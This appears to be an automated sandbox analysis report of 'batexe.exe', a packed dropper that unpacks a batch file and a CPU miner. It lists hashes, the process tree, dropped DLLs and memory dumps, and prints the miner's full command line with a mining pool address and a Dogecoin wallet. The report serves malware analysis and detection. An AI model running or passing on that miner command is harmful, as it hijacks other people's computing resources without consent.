73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
294s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21/02/2024, 03:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
5072	b2e.exe
3048	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3048	cpuminer-sse2.exe
3048	cpuminer-sse2.exe
3048	cpuminer-sse2.exe
3048	cpuminer-sse2.exe
3048	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2448-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2448 wrote to memory of 5072	2448	batexe.exe	32
PID 2448 wrote to memory of 5072	2448	batexe.exe	32
PID 2448 wrote to memory of 5072	2448	batexe.exe	32
PID 5072 wrote to memory of 3872	5072	b2e.exe	44
PID 5072 wrote to memory of 3872	5072	b2e.exe	44
PID 5072 wrote to memory of 3872	5072	b2e.exe	44
PID 3872 wrote to memory of 3048	3872	cmd.exe	43
PID 3872 wrote to memory of 3048	3872	cmd.exe	43

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2448
- C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3872

C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\b2e.exe

Filesize
136KB

MD5
aefab325b6ad2ebd694ec87a1f1e646c

SHA1
8d05539eac6e2bab1cc85df394ad4348927513c4

SHA256
c4a80b5f56b8c0a46053f5917ff745e38c0e3983757e74f4413136224b688afd

SHA512
6140966b71e3b0e3879d486889f2ddc3bececac82de134a3d43b042b5e3148254c4500ee61656900def6b1e8e98fbd9b68bcf8f1f18dae86b9f9e4ec66c25d8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\b2e.exe

Filesize
112KB

MD5
894074d7a3279b6d4e8f09405752b9df

SHA1
a62304b8bd90783fe0068375c3682fd939879617

SHA256
b72401fc54ae59494722c4ddf775d09f4accc4e8d6a603cb0f5336fda10b0710

SHA512
a6fb2bbda34a33dc30d63e91c046941fac1411834b7c46b7dd724e95d6114da62fd65a8d94d351cc1ecac80b6464855ba0da7ce5b0ecc6f2756b511507c65006

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
70KB

MD5
59d4c679f528ad538d5e1b2226f4a10f

SHA1
2cfb7a5e1e4582220274abef2ab290bbf27e1501

SHA256
2d3442034a76f90d9822af8ef199a76932ff852c6cb9488b184ac0f36626a965

SHA512
78225922a237d2b4a885b66400cbc6cd19929b454747f6c47e98f41376a31431216ce37a589a69a3a30696a2d9fb79af4e6d341a174eeac93dfd27b14cf6c538

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
85KB

MD5
638defb01fc9f26eece97525f328dd9a

SHA1
5a7d37650bc4c2acf7629b3acb3bd08fe9e45d94

SHA256
ceb4eb1d7b4ceb2d7ba29a3c2ea34fe291ab5fb19a8603062c2315dcaa86f5a9

SHA512
8b574a7ddd9d322d79c3b8b756f1b277c16d1059cd326e71e924dc158e0a11f62cb208fcf9869924ab4a9fe5be3c86f20d3e6192645b0ef184b0f2b85fbc9ba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
67KB

MD5
86b900cba745f6a088b34bfc9142d715

SHA1
ff1b915cb08515979f08463ab9ecbd327abe535b

SHA256
54276a0fab2903a1e5645ec8ccd3a36d5b74d31b8706fcdbde2e7c4ec8d57453

SHA512
00feba0be061adc028680b4d3c373b6473fb21195f84f6c03cd709c95f44c5b504a3a8f87cf95d52a1f04fcbfd3ccfd3fe21281b327e6909efd0fbd794ee56d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
43KB

MD5
acb080a11ce08c42d5f97bdd8d269ea4

SHA1
2a94a0011670b6f34f6fab46b36073b640478458

SHA256
ee08cb92664ee9c0c888d017ab937c36fcca717e39bb0bd555ceeef41cca3241

SHA512
7b4dcea99693e28a7f32731af222d6f1179e5d495f3aaed6c71af84fd78357956f5dae8ea206daba816a7006e089e0021dc0838f4c272d67dc6f6f179b988722

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
57KB

MD5
4a91d8f522a86a4a67e44a7667410a6f

SHA1
7ecf2598d4da2b1b105991b2f5a49c8e14e648a4

SHA256
4ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c

SHA512
aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
51KB

MD5
1fdfd5ce533c950061f6440fdd877f00

SHA1
77438d0fbe086275191a58638d1750c96ba78102

SHA256
c003bdc7a3ffb11f3df18ebb4e9c9f9557812a9068940f162a824a636eb24602

SHA512
5b2f56ef4db37c2d7c5645927099ec3059fcd62363527dc61a4557de69611e52bca6b8720937627ec99be284f52b2d921db7f7aee94a6617ea3a311cf49686fb

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
136KB

MD5
b960531228751b3d6b1da760c08a6166

SHA1
ddd6032bb2f39e3d972488da0589f500102b3d91

SHA256
acce0c6cbe5a49b7415f78b918fb6b332555216c58b3f2e4548adc8b327e838b

SHA512
a481b53c2917cef9aaa652e01ddc08335e678acc1d9f1c0065a4b4c7429e39028e70607df928f79025568f8b28c72e23060d977d2c8ff0106c9ba7b2f3415316

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
44KB

MD5
7d8ce136270aced356e5ce7978ca25b0

SHA1
0f9855a357227d25d0338a034638b43eb07d3800

SHA256
1278c8dad841e836998e931ce1bc15f87b37846bef100f59e45033dbc90aea3d

SHA512
625d98f27f503d0cb65cf6132d4fab661152d39ac698dbba669bbae566763289d4932010e1e54f4682fd2110b1977f24b1647ea872044dae42bd49ac88d463f7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
12KB

MD5
c1e777ce51ba955731ecffd32f36a7e0

SHA1
986af7e182a914083b0581aac33e4854cbf6b147

SHA256
c96a12712be66cbec11716c1dfac42f1f5ac9f9518148e7badf24335b7bb0ff0

SHA512
d42545a700d5430f7d2c503fdd40434142595a781fa0334042ce75212d5ec6e304c37baccdae107506db2d5d557f0fb6d68469b3432eac8ca90866f03b956119

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
88KB

MD5
ef543d37a71f87555c1fc289aba04282

SHA1
13d8a8fdb4cac891f35739e883e1a2d64b50b137

SHA256
41b1ea90701183c39d48e33499056a6e5fbfe55b3f7e38ec4079dd7f804404ea

SHA512
23214fc7c5fcbb617310c50d4efd52cf4e5fac4d92b182c0214ee732cdf43fd9ad4981cd87d9953d68fd3454ce745485a4b3954b2fde9a644f575291cc5193d1

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
82KB

MD5
802c3d59e4638bbbfe584106bb691b31

SHA1
134871975ba6aefb0588de48a8c4826baca9c488

SHA256
bb75643d994f89379468da2c158ad8dd7d87fa1e25b060d1daad1d4df3aa90c7

SHA512
beb76bc40bcdfc789ee9cef7b276aa25b549068960015e4fe7d72c9bad881f805d5566d6713e32327439218b07a5f507bf8c408f5efba37215989e6b7b081b7c

Download Submit
memory/2448-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3048-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3048-43-0x0000000070100000-0x0000000070198000-memory.dmp

Filesize
608KB

Download
memory/3048-44-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/3048-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3048-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3048-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5072-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5072-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download